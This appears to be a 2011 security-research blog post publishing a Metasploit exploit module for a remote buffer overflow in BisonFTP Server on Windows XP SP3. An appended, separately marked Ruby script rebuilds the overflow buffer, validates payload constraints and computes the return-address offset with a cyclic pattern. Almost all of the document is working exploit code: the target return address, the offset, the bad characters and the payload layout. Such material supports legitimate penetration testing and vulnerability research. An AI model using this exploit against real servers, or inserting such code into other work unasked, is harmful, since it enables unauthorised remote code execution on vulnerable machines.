
Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerability

SecPod Research Team member Veerendra G.G. wrote a Metasploit module for the BisonFTP Server remote buffer overflow vulnerability.

Sep 6, 2011 | By Veerendra GG | 2 min read


Metasploit module: Download here.

```ruby
##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    # Ftp mixin: supplies connect/disconnect, RHOST/RPORT options and the socket (sock)
    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
            'Description'    => %q{
                    This module exploits a buffer overflow vulnerability
                    found in the BisonFTP Server
            },
            'References'     =>
                [
                    [ 'BID', '49109'],
                    [ 'CVE', '1999-1510'],
                    [ 'URL', 'https://www.secpod.com/blog/?p=384'],
                    [ 'URL', 'http://www.exploit-db.com/exploits/17649'],
                    [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space' => 388,                  # bytes reserved for the encoded payload in the buffer
                    'BadChars' => "\x00\x0a\x0d",    # NUL, LF and CR would terminate the FTP line
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP3 EN',
                        {
                            'Ret' => 0x0040333f, # call edx from Bisonftp.exe (XP SP3 has no ASLR)
                            'Offset' => 1432     # distance from buffer start to the saved return address
                        }
                    ],
                ],
            'DisclosureDate' => 'Aug 07 2011',
            'DefaultTarget' => 0))
    end

    def exploit
        connect    # Ftp mixin: TCP connect to RHOST:RPORT and read the banner

        print_status("Trying target #{target.name}...")
        print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")

        # Buffer layout (byte offsets):
        #    0 .. 1027  random filler
        # 1028 .. 1043  16-byte NOP padding
        # 1044 .. 1431  payload slot, 388 bytes (Space), NOP-padded to full size
        # 1432 .. 1435  saved return address (1028 + 16 + 388 == target 'Offset')
        # 1436 .. 1474  trailing filler
        sploit = rand_text_alpha(1028)                        ## Random Buffer
        sploit << "\x90" * 16                                 ## Padding
        sploit << payload.encoded                             ## Encoded Payload
        sploit << "\x90" * (388 - payload.encoded.length)     ## More Nops
        sploit << [target.ret].pack('V')                      ## Return Address (32-bit little-endian)
        sploit << rand_text_alpha(39)                         ## More Buffer

        print_status("Sending payload...")
        sock.put(sploit)    # raw write to the control connection; no FTP verb or CRLF is added

        handler
        disconnect
    end

end
```
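As an added example, not code from the original post or from the module above: the buffer layout of bison_server_bof.rb rebuilt in plain Ruby, with the checks a practitioner would run before firing it (the payload fits in Space, contains no BadChars, and the return address really lands at Offset 1432), plus a Metasploit-style cyclic pattern showing how an Offset value such as 1432 is derived from the EIP value seen in a debugger. The constant names, the INT3 stand-in payload and the deterministic 'A'/'B' filler are assumptions of this example, not the module's.

```ruby
# Added example (not part of the SecPod module): rebuilds the overflow buffer
# from bison_server_bof.rb outside Metasploit so the layout constants can be
# checked, and shows how an 'Offset' like 1432 is derived with a cyclic pattern.

FILLER_LEN    = 1028                 # rand_text_alpha(1028) in the module
NOP_PAD_LEN   = 16                   # "\x90" * 16
PAYLOAD_SPACE = 388                  # 'Space' => 388
TAIL_LEN      = 39                   # rand_text_alpha(39)
RET_OFFSET    = 1432                 # 'Offset' => 1432 in the target
RET_ADDR      = 0x0040333f           # 'Ret': call edx in Bisonftp.exe (taken from the module)
BAD_CHARS     = "\x00\x0a\x0d".b     # 'BadChars' from the module

# The return address must land exactly where the target says it does.
raise 'layout mismatch' unless FILLER_LEN + NOP_PAD_LEN + PAYLOAD_SPACE == RET_OFFSET

# Metasploit-style cyclic pattern (pattern_create.rb): 'Aa0Aa1Aa2...'. Every
# 4-byte window is unique within the first 20280 bytes, so the value found in
# EIP after a crash identifies its byte offset in the buffer that was sent.
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# pattern_offset.rb: EIP value as read in the debugger (little-endian) -> byte offset.
def pattern_offset(eip_value, length = 20280)
  pattern_create(length).index([eip_value].pack('V'))
end

# Checks the module's payload constraints ('Space' and 'BadChars').
def payload_ok?(shellcode)
  sc = shellcode.b
  sc.length <= PAYLOAD_SPACE && (sc.bytes & BAD_CHARS.bytes).empty?
end

# Same layout as the module's exploit method, with deterministic filler
# instead of rand_text_alpha so the result is reproducible.
def build_overflow(shellcode, ret = RET_ADDR)
  sc = shellcode.b
  raise ArgumentError, 'payload violates Space/BadChars' unless payload_ok?(sc)
  [
    'A' * FILLER_LEN,                          # random buffer in the module
    "\x90" * NOP_PAD_LEN,                      # NOP padding
    sc,                                        # payload.encoded
    "\x90" * (PAYLOAD_SPACE - sc.length),      # pad the payload slot to 388 bytes
    ret,                                       # [target.ret].pack('V'), little-endian
    'B' * TAIL_LEN                             # trailing buffer
  ].pack('a*a*a*a*Va*')
end

# Offset at which the return address actually sits in a built buffer.
def ret_offset(buf, ret = RET_ADDR)
  buf.index([ret].pack('V'))
end

if $PROGRAM_NAME == __FILE__
  # Constructed stand-in for payload.encoded: 20 INT3 breakpoints.
  sc  = "\xcc".b * 20
  buf = build_overflow(sc)
  puts "buffer length: #{buf.length}, ret at offset #{ret_offset(buf)}"
  # Simulate the crash: the 4 pattern bytes at offset 1432 are what EIP would hold.
  eip = pattern_create(1500)[RET_OFFSET, 4].unpack1('V')
  puts format('EIP 0x%08x -> pattern_offset %d', eip, pattern_offset(eip))
end
```

This runs with plain `ruby` and no Metasploit install; swap the real `payload.encoded` bytes in for the INT3 stand-in to check them against the module's Space and BadChars. The `call edx` address is taken from the module as-is; whether EDX points into the sent buffer at the moment of the overwrite is something to confirm in the debugger on the target, not something this script can verify.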

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team
